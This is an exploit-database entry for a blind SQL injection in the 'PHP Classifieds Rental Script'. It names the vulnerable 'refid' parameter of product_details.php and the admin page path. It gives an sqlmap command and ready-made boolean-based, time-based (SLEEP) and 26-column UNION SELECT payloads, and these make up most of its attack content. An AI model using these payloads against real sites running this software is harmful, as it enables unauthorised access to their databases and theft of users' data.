PHP Classifieds Rental Script - Blind SQL Injection Vulnerability

2016-10-07T00:00:00
ID 1337DAY-ID-25369
Type zdt
Reporter OoN_Boy
Modified 2016-10-07T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            [x]========================================================================================================================================[x]
 | Title    : PHP Classifieds Rental Script Blind SQL Vulnerabilities
 | Software : PHP Classifieds Rental Script
 | Vendor   : http://www.i-netsolution.com/
 | Demo         : http://www.i-netsolution.com/item/php-classifieds-rental-script/244993
 | Date         : 06 October 2016
 | Author   : OoN_Boy
[x]========================================================================================================================================[x]
  
  
  
[x]========================================================================================================================================[x]
 | Technology       : PHP
 | Database     : MySQL
 | Price        : $ 99
 | Description      : PHP Classifieds Rental Script The PHP Rental Classifieds Script is one among the limited software's, which are designed
              so user-friendly that anyone with minimal knowledge of operating a computer can utilize it to its optimum. Besides being
              an easy-to- use software, this Property Rental Script
[x]========================================================================================================================================[x]
  
  
[x]========================================================================================================================================[x]
 | Exploit  : http://localhost/product_details.php?refid=%Inject_Here%1319258872
 | Aadmin Page  : http://localhost/[path]/admin/index.php  
[x]========================================================================================================================================[x]
  
  
  
[x]========================================================================================================================================[x]
 | Proof of concept : sqlmap -u "http://localhost/product_details.php?refid=1319258872" --invalid-string
[x]========================================================================================================================================[x] 
 
 ---
Parameter: refid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: refid=1319258872' AND 3912=3912 AND 'HTMi'='HTMi
 
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: refid=1319258872' OR SLEEP(5) AND 'QwXZ'='QwXZ
 
    Type: UNION query
    Title: MySQL UNION query (NULL) - 26 columns
    Payload: refid=xCUcyB' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787671,0x644e6e5046537647684864705a527667796f454c666c4656644a73506d4e627a48574969424a4756,0x7176786271),NULL,NULL,NULL,NULL,NULL#
---

#  0day.today [2018-01-05]  #